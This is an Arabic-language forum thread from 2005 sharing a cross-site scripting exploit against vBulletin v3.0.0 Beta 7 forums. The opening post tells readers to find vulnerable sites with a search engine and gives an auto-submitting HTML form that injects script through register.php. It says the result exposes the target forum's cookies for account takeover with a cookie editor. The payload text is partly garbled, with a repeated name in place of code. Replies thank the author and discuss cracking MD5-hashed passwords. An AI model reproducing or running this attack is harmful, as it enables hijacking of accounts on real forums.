| |||||||
| منتدى الكمبيوتر والأنترنت جميع البرامج الجديده وحلول المشاكل تجدها هنا |
 الإهداءات |
ثغرة فى منتديات vb-ثغرة فى منتديات vb-ثغرة فى منتديات vbثغرة فى منتديات vb-ثغرة فى منتديات vb-ثغرة فى منتديات vb- ثغرة فى منتديات vbثغرة فى منتديات vb : ثغرة فى منتديات vbمنتدى الكمبيوتر والأنترنت : منتدى الكمبيوتر والأنترنت |
 |
| | أدوات الموضوع | إبحث في الموضوع |
|
#1
19-Mar-2005, 05:23 PM
| |||
| |||
| ثغرة فى منتديات vb بسم الله الحمن الرحيم -------------------------------- الكاتب :islamm2003 الحقوق محفوظه للكاتب islamm203 -------------------------- الثغره موجوده في منتديات vBulletin v3.0.0 Beta 7 والكثير من المنتديات مصابه -------------------------------- اول شئ روح لموقع البحث مثل [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] ابحث عن هذه الكلمه vBulletin v3.0.0 Beta 7 ---------------------------------------------- خود هذه الكود وضعه في المفكره Notepad وحفظه بمنداد html كود: كود: <form action="http://[VICTIM - FORUM PATH]/register.php?do=register" method="post" style="display:none"> <input type="hidden" name="s" value="" /> <input type="hidden" name="regtype" value="1" /> <input type="text" class="bginput" name="field1" value="" size="25" maxlength="250" /> <input type="hidden" name="url" value="index.php" /> <input type="hidden" name="do" value="addmember" /> </form> <script> //Code that will be executed var xss = "\"><script>alert(document"+".ابو عمرابو عمرابو عمرابو عمرابو عمرابو عمر)<\/script>"; document.forms(0).field1.value=xss; document.forms(0).submit(); </script> --------------------------------------------------------------- مثل هذه الموقع مصاب بالثغره [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] غير في الكود [VICTIM - FORUM PATH]/ الي المنتديات المصابه احفظ الملف بمتداد html ------------------------------------------------ افتح ملف الهوتمل هيظهر ليك الكوكيز للـ المنتدي المصاب الان الان انت عارف الباقي عن طريق برنامج ابو عمرابو عمرابو عمرابو عمرابو عمرابو عمر Editor واكيد استخدمته في ثغره last10.php تحياتي  |
|
#3
13-Apr-2005, 04:19 PM
| |||
| |||
| مشاركة: ثغرة فى منتديات vb islamm2003 يعطيك العافيه اخوي وماقصرت ومجهود رائع
__________________ [poem font="Simplified Arabic,4,blue,normal,normal" bkcolor="transparent" bkimage="backgrounds/20.gif" border="double,7,darkblue" type=0 line=0 align=center use=ex num="0,black"] من يجهل أسلوب المكر عاش محتار= ومن يلبس ثياب الكبر مات عـاري والدمعه اللي تحتري حزن الأعـذار= ماظنها تنفـع ضعيـف المـواري ماللصقر حشمـه وقيمـه ومقـدار= أن كان مايدمي صـدور الحبـاري[/poem] |
|
#4
20-Apr-2005, 03:13 PM
| |||
| |||
| مشاركة: ثغرة فى منتديات vb اخوي اسلام ما قصرت ويعطيك العافيه.... بس الثغره قديمه شوي :) وغير كذا للأسف الباس ورد اللي تنتج عن هذي الثغره هي باس ورد مشفره تشفير md5 والمصيبه العضما انها تختلف عن تشفير الجيل الثاني للمنتديات المصابه هذا النوع اللي هو الجيل الثالث مشفر تشفير md5 معقد ومضيوف عليه خانتين وهميات يعني مشفر مرتين الشي اللي يجعل فكه مستحيل اذاً الحل هنا هو معدل الكوكيز وهذا ايضاً ما ينفع مع التشفير مرتني للجيل الثالث فهوه يتخدم نضام اخر زيارة.... على العموم انت ما قصرت ويعطيك العافيه ومشكورررر :) |
|
| يشاهد محتوى الموضوع الآن : 1 ( 0 عضو - 1 زائر ) | |
| أدوات الموضوع | إبحث في الموضوع |
| | |||||||||
| ثغرة فى منتديات vb ثغرة فى منتديات vb ثغرة فى منتديات vb ثغرة فى منتديات vb ثغرة فى منتديات vb |
